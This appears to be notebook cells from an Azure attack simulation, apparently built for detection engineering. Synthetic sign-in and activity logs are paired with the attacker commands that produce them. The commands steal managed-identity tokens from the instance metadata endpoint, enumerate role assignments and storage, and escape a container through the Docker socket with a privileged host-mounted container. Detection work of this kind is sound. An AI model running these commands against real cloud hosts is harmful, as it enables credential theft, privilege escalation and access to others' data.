  "Identity": "azvm-linux-01-managed-identity",
  "SignInIdentifier": "ManagedIdentity",
  "SignInIdentifierType": "servicePrincipal",

  "ClientAppUsed": "Managed Identity",
  "UserAgent": "curl/7.88.1",
  "IsInteractive": false,

  "AuthenticationProtocol": "oAuth2",
  "AuthenticationRequirement": "None",
  "IncomingTokenType": "managedIdentityAccessToken",

  "Status": {
    "errorCode": 0,
    "failureReason": null,
    "additionalDetails": "Managed identity token issued successfully"
  },

  "DurationMs": 183,
  "SessionId": "mi-session-3c19e2b1-7e6d-4a91-8cdd-1b7d9d2f4a77",
  "CorrelationId": "c7b91a44-2f21-4f92-9f63-0e61d7cbd881",

  "RiskLevelAggregated": "none",
  "RiskLevelDuringSignIn": "none",
  "RiskState": "none",
  "RiskDetail": "none",

  "TokenIssuerType": "AzureAD",
  "NetworkLocationDetails": "Azure Virtual Network",

  "_IsBillable": "true"
}


In [None]:
{
  "TimeGenerated": "2025-12-14T10:42:50.201Z",
  "EventSubmissionTimestamp": "2025-12-14T10:42:50.489Z",

  "Type": "AzureActivity",
  "SourceSystem": "Azure",

  "Category": "Administrative",
  "CategoryValue": "Administrative",

  "Level": "Informational",

  "ActivityStatus": "Succeeded",
  "ActivityStatusValue": "Succeeded",
  "ActivitySubstatus": "OK",
  "ActivitySubstatusValue": "OK (HTTP Status Code: 200)",

  "OperationId": "4d7e9f12-8a6b-4c3a-bf90-3e3b44c2f8aa",
  "OperationName": "Microsoft.Authorization/roleAssignments/read",
  "OperationNameValue": "Microsoft.Authorization/roleAssignments/read",

  "CorrelationId": "c7b91a44-2f21-4f92-9f63-0e61d7cbd881",
  "EventDataId": "b0f8d2c1-1d9a-4a77-8e3d-9c9d71d8fabc",

  "Caller": "a1b2c3d4-e5f6-7890-abcd-111122223333",
  "CallerIpAddress": "10.0.1.25",
  "Authorization_d": {
    "action": "Microsoft.Authorization/roleAssignments/read",
    "role": "Reader",
    "scope": "/subscriptions/3fa85f64-5717-4562-b3fc-2c963f66afa6"
  },

  "Claims": "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6IjE2QkE5QzY4In0.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tLyIsImlzcyI6Imh0dHBzOi8vbG9naW4ubWljcm9zb2Z0b25saW5lLmNvbS8xMjM0NTY3OC05YWJjLWRlZjAtMTIzNC01Njc4OWFiY2RlZi92Mi4wIiwiaWF0IjoxNzM0MTcyOTY4LCJuYmYiOjE3MzQxNzI5NjgsImV4cCI6MTczNDE3NjU2OCwiYWlkIjoiYXp1cmUtbWFuYWdlZC1pZGVudGl0eSIsInRpZCI6IjEyMzQ1Njc4LTlhYmMtZGVmMC0xMjM0LTU2Nzg5YWJjZGVmIn0.signature",
  "Claims_d": {
    "aud": "https://management.azure.com/",
    "iss": "https://login.microsoftonline.com/12345678-9abc-def0-1234-56789abcdef0/v2.0",
    "iat": 1734172968,
    "nbf": 1734172968,
    "exp": 1734176568,
    "appid": "a1b2c3d4-e5f6-7890-abcd-111122223333",
    "appidacr": "2",
    "tid": "12345678-9abc-def0-1234-56789abcdef0"
  },

  "HTTPRequest": "{\"clientRequestId\":\"9b7c3e14-4b0d-4b35-9f8c-bbe7b6c9f222\",\"clientIpAddress\":\"10.0.1.25\",\"method\":\"GET\"}",

  "Properties": "{\"responseBody\":\"Role assignments listed successfully\",\"requestUri\":\"/subscriptions/3fa85f64-5717-4562-b3fc-2c963f66afa6/providers/Microsoft.Authorization/roleAssignments\"}",
  "Properties_d": {
    "responseBody": "Role assignments listed successfully",
    "requestUri": "/subscriptions/3fa85f64-5717-4562-b3fc-2c963f66afa6/providers/Microsoft.Authorization/roleAssignments",
    "httpStatusCode": 200
  },

  "Resource": "Microsoft.Authorization/roleAssignments",
  "ResourceGroup": null,

  "ResourceId": "/subscriptions/3fa85f64-5717-4562-b3fc-2c963f66afa6",
  "_ResourceId": "/subscriptions/3fa85f64-5717-4562-b3fc-2c963f66afa6",

  "ResourceProvider": "Microsoft.Authorization",
  "ResourceProviderValue": "Microsoft.Authorization",

  "SubscriptionId": "3fa85f64-5717-4562-b3fc-2c963f66afa6",
  "_SubscriptionId": "3fa85f64-5717-4562-b3fc-2c963f66afa6",

  "Hierarchy": null,

  "TenantId": "12345678-9abc-def0-1234-56789abcdef0",

  "_IsBillable": "true",
  "_BilledSize": 3.14
}


In [None]:
curl -H "Authorization: Bearer <ACCESS_TOKEN>" \
  "https://management.azure.com/subscriptions/<SUB_ID>/providers/Microsoft.Storage/storageAccounts?api-version=2023-01-01"


In [None]:
{
  "TimeGenerated": "2025-12-14T10:42:53.412Z",
  "ResourceId": "/subscriptions/11111111-2222-3333-4444-555555555555/resourcegroups/security-logs/providers/microsoft.operationalinsights/workspaces/azvm-linux-sentinel",
  "Category": "SignInLogs",
  "OperationName": "Sign-in activity",
  "Type": "SigninLogs",

  "AADTenantId": "12345678-9abc-def0-1234-56789abcdef0",
  "Id": "signin-azmi-storageenum-91c2d7a4-5b6f-4f99-8f31-7b61e9f2e111",
  "CreatedDateTime": "2025-12-14T10:42:53.412Z",

  "UserDisplayName": null,
  "UserPrincipalName": null,
  "UserId": null,
  "UserType": "ServicePrincipal",

  "AppId": "a1b2c3d4-e5f6-7890-abcd-111122223333",
  "AppDisplayName": "Azure Resource Manager",
  "ServicePrincipalId": "a1b2c3d4-e5f6-7890-abcd-111122223333",
  "ServicePrincipalName": "azvm-linux-01-managed-identity",

  "ResourceDisplayName": "Azure Resource Manager",
  "ResourceIdentity": "https://management.azure.com/",
  "ResourceServicePrincipalId": "797f4846-ba00-4fd7-ba43-dac1f8f63013",

  "IPAddress": "10.0.1.25",
  "Location": "Azure Datacenter",
  "LocationDetails": {
    "city": null,
    "state": null,
    "countryOrRegion": "Azure"
  },

  "DeviceDetail": {
    "deviceId": "AZVM-LINUX-01",
    "displayName": "linux-vm-01",
    "operatingSystem": "Linux",
    "browser": "curl",
    "isCompliant": false,
    "isManaged": false,
    "trustType": "AzureAD"
  },

  "Identity": "azvm-linux-01-managed-identity",
  "SignInIdentifier": "ManagedIdentity",
  "SignInIdentifierType": "servicePrincipal",

  "ClientAppUsed": "Managed Identity",
  "UserAgent": "curl/7.88.1",
  "IsInteractive": false,

  "AuthenticationProtocol": "oAuth2",
  "AuthenticationRequirement": "None",
  "IncomingTokenType": "managedIdentityAccessToken",

  "Status": {
    "errorCode": 0,
    "failureReason": null,
    "additionalDetails": "Managed identity access token validated for ARM request"
  },

  "DurationMs": 161,
  "SessionId": "mi-session-3c19e2b1-7e6d-4a91-8cdd-1b7d9d2f4a77",
  "CorrelationId": "c7b91a44-2f21-4f92-9f63-0e61d7cbd881",

  "RiskLevelAggregated": "none",
  "RiskLevelDuringSignIn": "none",
  "RiskState": "none",
  "RiskDetail": "none",

  "TokenIssuerType": "AzureAD",
  "NetworkLocationDetails": "Azure Virtual Network",

  "_IsBillable": "true"
}


In [None]:
{
  "TimeGenerated": "2025-12-14T10:42:54.087Z",
  "EventSubmissionTimestamp": "2025-12-14T10:42:54.391Z",

  "Type": "AzureActivity",
  "SourceSystem": "Azure",

  "Category": "Administrative",
  "CategoryValue": "Administrative",

  "Level": "Informational",

  "ActivityStatus": "Succeeded",
  "ActivityStatusValue": "Succeeded",
  "ActivitySubstatus": "OK",
  "ActivitySubstatusValue": "OK (HTTP Status Code: 200)",

  "OperationId": "8a1b6f7c-44d2-4d8b-8f71-8b6a21f59a21",
  "OperationName": "Microsoft.Storage/storageAccounts/read",
  "OperationNameValue": "Microsoft.Storage/storageAccounts/read",

  "CorrelationId": "c7b91a44-2f21-4f92-9f63-0e61d7cbd881",
  "EventDataId": "f1d8a29b-33d2-4d8c-9c61-1a8b3f41dabc",

  "Caller": "a1b2c3d4-e5f6-7890-abcd-111122223333",
  "CallerIpAddress": "10.0.1.25",

  "Authorization": "{\"action\":\"Microsoft.Storage/storageAccounts/read\",\"role\":\"Reader\",\"scope\":\"/subscriptions/3fa85f64-5717-4562-b3fc-2c963f66afa6\"}",
  "Authorization_d": {
    "action": "Microsoft.Storage/storageAccounts/read",
    "role": "Reader",
    "scope": "/subscriptions/3fa85f64-5717-4562-b3fc-2c963f66afa6"
  },

  "Claims": "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIn0.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tLyIsImFwcGlkIjoiYTFiMmMzZDQtZTVmNi03ODkwLWFiY2QtMTExMTIyMjIzMzMzIiwidGlkIjoiMTIzNDU2NzgtOWFiYy1kZWYwLTEyMzQtNTY3ODlhYmNkZWYwIn0.signature",
  "Claims_d": {
    "aud": "https://management.azure.com/",
    "appid": "a1b2c3d4-e5f6-7890-abcd-111122223333",
    "appidacr": "2",
    "tid": "12345678-9abc-def0-1234-56789abcdef0"
  },

  "HTTPRequest": "{\"clientRequestId\":\"0a92b3e7-7f9b-4c63-9b5e-1c7d8b91e999\",\"clientIpAddress\":\"10.0.1.25\",\"method\":\"GET\"}",

  "Properties": "{\"requestUri\":\"/subscriptions/3fa85f64-5717-4562-b3fc-2c963f66afa6/providers/Microsoft.Storage/storageAccounts\",\"responseBody\":\"Storage accounts listed\"}",
  "Properties_d": {
    "requestUri": "/subscriptions/3fa85f64-5717-4562-b3fc-2c963f66afa6/providers/Microsoft.Storage/storageAccounts",
    "httpStatusCode": 200,
    "result": "Succeeded"
  },

  "Resource": "Microsoft.Storage/storageAccounts",
  "ResourceGroup": null,

  "ResourceId": "/subscriptions/3fa85f64-5717-4562-b3fc-2c963f66afa6",
  "_ResourceId": "/subscriptions/3fa85f64-5717-4562-b3fc-2c963f66afa6",

  "ResourceProvider": "Microsoft.Storage",
  "ResourceProviderValue": "Microsoft.Storage",

  "SubscriptionId": "3fa85f64-5717-4562-b3fc-2c963f66afa6",
  "_SubscriptionId": "3fa85f64-5717-4562-b3fc-2c963f66afa6",

  "Hierarchy": null,

  "TenantId": "12345678-9abc-def0-1234-56789abcdef0",

  "_IsBillable": "true",
  "_BilledSize": 3.67
}


In [None]:
curl -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://storage.azure.com/"
curl -H "Authorization: Bearer <STORAGE_TOKEN>" \
  "https://<storage-account>.blob.core.windows.net/?comp=list"
Telemetry later
AzureActivity
Microsoft.Storage/storageAccounts/listKeys/action (if keys)
StorageBlobLogs
Container listing
AADSignInLogs
Token used for Storage

In [None]:
{
  "TimeGenerated": "2025-12-14T10:42:56.102Z",
  "ResourceId": "/subscriptions/11111111-2222-3333-4444-555555555555/resourcegroups/security-logs/providers/microsoft.operationalinsights/workspaces/azvm-linux-sentinel",
  "Category": "SignInLogs",
  "OperationName": "Sign-in activity",
  "Type": "SigninLogs",

  "AADTenantId": "12345678-9abc-def0-1234-56789abcdef0",
  "Id": "signin-azmi-storage-token-3a2b1c9e-5f0a-4e2a-9c61-cc8a1b4f0c22",
  "CreatedDateTime": "2025-12-14T10:42:56.102Z",

  "UserDisplayName": null,
  "UserPrincipalName": null,
  "UserId": null,
  "UserType": "ServicePrincipal",

  "AppId": "a1b2c3d4-e5f6-7890-abcd-111122223333",
  "AppDisplayName": "Azure Storage",
  "ServicePrincipalId": "a1b2c3d4-e5f6-7890-abcd-111122223333",
  "ServicePrincipalName": "azvm-linux-01-managed-identity",

  "ResourceDisplayName": "Azure Storage",
  "ResourceIdentity": "https://storage.azure.com/",
  "ResourceServicePrincipalId": "e406a681-f3d4-42a8-90b6-c2b029497af1",

  "IPAddress": "10.0.1.25",
  "Location": "Azure Datacenter",
  "LocationDetails": {
    "city": null,
    "state": null,
    "countryOrRegion": "Azure"
  },

  "DeviceDetail": {
    "deviceId": "AZVM-LINUX-01",
    "displayName": "linux-vm-01",
    "operatingSystem": "Linux",
    "browser": "curl",
    "isCompliant": false,
    "isManaged": false,
    "trustType": "AzureAD"
  },

  "Identity": "azvm-linux-01-managed-identity",
  "SignInIdentifier": "ManagedIdentity",
  "SignInIdentifierType": "servicePrincipal",

  "ClientAppUsed": "Managed Identity",
  "UserAgent": "curl/7.88.1",
  "IsInteractive": false,

  "AuthenticationProtocol": "oAuth2",
  "AuthenticationRequirement": "None",
  "IncomingTokenType": "managedIdentityAccessToken",

  "Status": {
    "errorCode": 0,
    "failureReason": null,
    "additionalDetails": "Managed identity access token issued for Azure Storage resource"
  },

  "DurationMs": 147,
  "SessionId": "mi-session-3c19e2b1-7e6d-4a91-8cdd-1b7d9d2f4a77",
  "CorrelationId": "c7b91a44-2f21-4f92-9f63-0e61d7cbd881",

  "RiskLevelAggregated": "none",
  "RiskLevelDuringSignIn": "none",
  "RiskState": "none",
  "RiskDetail": "none",

  "TokenIssuerType": "AzureAD",
  "NetworkLocationDetails": "Azure Virtual Network",

  "_IsBillable": "true"
}


In [None]:
{
  "TimeGenerated": "2025-12-14T10:42:56.981Z",
  "EventSubmissionTimestamp": "2025-12-14T10:42:57.244Z",
  "Type": "AzureActivity",
  "SourceSystem": "Azure",
  "Category": "Administrative",
  "CategoryValue": "Administrative",
  "Level": "Informational",
  "ActivityStatus": "Succeeded",
  "ActivityStatusValue": "Succeeded",
  "ActivitySubstatus": "OK",
  "ActivitySubstatusValue": "OK (HTTP Status Code: 200)",
  "OperationId": "c1e9f2b3-0a6d-4a88-9c41-7b91a2e0d333",
  "OperationName": "Microsoft.Storage/storageAccounts/blobServices/containers/read",
  "OperationNameValue": "Microsoft.Storage/storageAccounts/blobServices/containers/read",
  "CorrelationId": "c7b91a44-2f21-4f92-9f63-0e61d7cbd881",
  "EventDataId": "e2a9b1c4-7a44-4bde-8c21-5a9f3e112abc",
  "Caller": "a1b2c3d4-e5f6-7890-abcd-111122223333",
  "CallerIpAddress": "10.0.1.25",
  "Authorization": "{\"action\":\"Microsoft.Storage/storageAccounts/blobServices/containers/read\",\"role\":\"Storage Blob Data Reader\",\"scope\":\"/subscriptions/3fa85f64-5717-4562-b3fc-2c963f66afa6/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/corpbackupsprod\"}",
  "Authorization_d": {
    "action": "Microsoft.Storage/storageAccounts/blobServices/containers/read",
    "role": "Storage Blob Data Reader",
    "scope": "/subscriptions/3fa85f64-5717-4562-b3fc-2c963f66afa6/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/corpbackupsprod"
  },

  "Claims": "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIn0.eyJhdWQiOiJodHRwczovL3N0b3JhZ2UuYXp1cmUuY29tLyIsImFwcGlkIjoiYTFiMmMzZDQtZTVmNi03ODkwLWFiY2QtMTExMTIyMjIzMzMzIiwidGlkIjoiMTIzNDU2NzgtOWFiYy1kZWYwLTEyMzQtNTY3ODlhYmNkZWYwIn0.signature",
  "Claims_d": {
    "aud": "https://storage.azure.com/",
    "appid": "a1b2c3d4-e5f6-7890-abcd-111122223333",
    "appidacr": "2",
    "tid": "12345678-9abc-def0-1234-56789abcdef0"
  },

  "HTTPRequest": "{\"clientRequestId\":\"6c9b44a2-7b6e-4a9f-93e2-cc3a2b55e101\",\"clientIpAddress\":\"10.0.1.25\",\"method\":\"GET\"}",

  "Properties": "{\"requestUri\":\"https://corpbackupsprod.blob.core.windows.net/?comp=list\",\"responseBody\":\"Blob containers listed\"}",
  "Properties_d": {
    "requestUri": "https://corpbackupsprod.blob.core.windows.net/?comp=list",
    "httpStatusCode": 200,
    "result": "Succeeded"
  },

  "Resource": "Microsoft.Storage/storageAccounts/blobServices/containers",
  "ResourceGroup": "rg-prod",

  "ResourceId": "/subscriptions/3fa85f64-5717-4562-b3fc-2c963f66afa6/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/corpbackupsprod",
  "_ResourceId": "/subscriptions/3fa85f64-5717-4562-b3fc-2c963f66afa6/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/corpbackupsprod",

  "ResourceProvider": "Microsoft.Storage",
  "ResourceProviderValue": "Microsoft.Storage",

  "SubscriptionId": "3fa85f64-5717-4562-b3fc-2c963f66afa6",
  "_SubscriptionId": "3fa85f64-5717-4562-b3fc-2c963f66afa6",

  "Hierarchy": null,

  "TenantId": "12345678-9abc-def0-1234-56789abcdef0",

  "_IsBillable": "true",
  "_BilledSize": 3.89
}


In [None]:
curl --unix-socket /var/run/docker.sock \
  -X POST http://localhost/containers/create \
  -d '{
    "Image": "alpine",
    "HostConfig": {
      "Privileged": true,
      "Binds": ["/:/host"]
    },
    "Cmd": ["sh"]
  }'
curl --unix-socket /var/run/docker.sock \
  -X POST http://localhost/containers/<id>/start
Telemetry later
DeviceProcessEvents
dockerd activity
SecurityAlert
Docker socket abuse / privileged container
Potential gap if Defender not hardened (realistic!)

In [None]:
{
  "Timestamp": "2025-12-14T10:43:02.447Z",
  "DeviceId": "AZVM-LINUX-01",
  "DeviceName": "linux-vm-01.eastus.cloudapp.azure.com",
  "DeviceOSPlatform": "Linux",
  "ActionType": "ProcessCreated",

  "FileName": "curl",
  "FolderPath": "/usr/bin/curl",
  "ProcessId": 4521,
  "ProcessCommandLine": "curl --unix-socket /var/run/docker.sock -X POST http://localhost/containers/create -d '{\"Image\":\"alpine\",\"HostConfig\":{\"Privileged\":true,\"Binds\":[\"/:/host\"]},\"Cmd\":[\"sh\"]}'",
  "ProcessCreationTime": "2025-12-14T10:43:02.447Z",

  "AccountName": "www-data",
  "AccountDomain": "container",
  "AccountSid": "uid-33",

  "InitiatingProcessFileName": "sh",
  "InitiatingProcessFolderPath": "/bin/sh",
  "InitiatingProcessId": 4151,
  "InitiatingProcessCommandLine": "sh",
  "InitiatingProcessCreationTime": "2025-12-14T10:41:53.287Z",

  "InitiatingProcessParentFileName": "python3",
  "InitiatingProcessParentId": 4123,
  "InitiatingProcessParentCreationTime": "2025-12-14T10:41:52.113Z",

  "InitiatingProcessAccountName": "www-data",
  "InitiatingProcessAccountDomain": "container",
  "InitiatingProcessAccountSid": "uid-33",

  "ProcessUniqueId": "4521-2025-12-14T10:43:02.447Z",
  "InitiatingProcessUniqueId": "4151-2025-12-14T10:41:53.287Z",

  "AdditionalFields": "{\"Containerized\":\"true\",\"DockerSocketAccess\":\"true\",\"PrivilegedContainerRequest\":\"true\",\"HostFilesystemBind\":\"/:/host\",\"AttackTechnique\":\"ContainerEscape\",\"RiskLevel\":\"Critical\"}"
}


In [None]:
curl -H Metadata:true "http://169.254.169.254/metadata/identity?api-version=2018-02-01"
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
curl -H "Metadata: true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2019-08-01&resource=https://storage.azure.com/"



In [None]:
TOKEN=$(curl -s -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2019-08-01&resource=https://graph.microsoft.com/" \
| jq -r .access_token)

curl -s -H "Authorization: Bearer $TOKEN" \
"https://graph.microsoft.com/v1.0/me"


curl -s -H "Authorization: Bearer $TOKEN" \
"https://graph.microsoft.com/v1.0/servicePrincipals?$filter=appId eq '<client-id>'"


In [None]:
MI_OBJECT_ID=$(az account show --query user.assignedIdentityInfo.principalId -o tsv)

MI_OBJECT_ID=$(az resource show \
  --ids $(curl -s -H Metadata:true \
  "http://169.254.169.254/metadata/instance/compute/resourceId?api-version=2021-02-01&format=text") \
  --query identity.principalId -o tsv)
az role assignment list --assignee-object-id $MI_OBJECT_ID


In [None]:
# Login using Managed Identity
az login --identity

# Get Managed Identity principalId
az account show --query user.assignedIdentityInfo.principalId -o tsv

# Enumerate RBAC assignments
az role assignment list --assignee-object-id <principalId>

# Test real access (truth source)
az storage blob list --account-name mystorage --container-name test --auth-mode login


In [None]:
az login --identity
az account show


In [None]:
ARM_TOKEN=$(curl -s -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2019-08-01&resource=https://management.azure.com/" \
| jq -r .access_token)

curl -s -H "Authorization: Bearer $ARM_TOKEN" \
"https://management.azure.com/subscriptions/<sub-id>/providers/Microsoft.Authorization/roleAssignments?api-version=2022-04-01"

curl -s -H "Authorization: Bearer $ARM_TOKEN" \
"https://management.azure.com/providers/Microsoft.Authorization/roleDefinitions/<role-id>?api-version=2022-04-01"


In [None]:
az login --identity
az storage blob list \
  --account-name mystorageaccount \
  --container-name mycontainer \
  --auth-mode login

ST_TOKEN=$(curl -s -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2019-08-01&resource=https://storage.azure.com/" \
| jq -r .access_token)

curl -s -H "Authorization: Bearer $ST_TOKEN" \
"https://mystorageaccount.blob.core.windows.net/?comp=list"
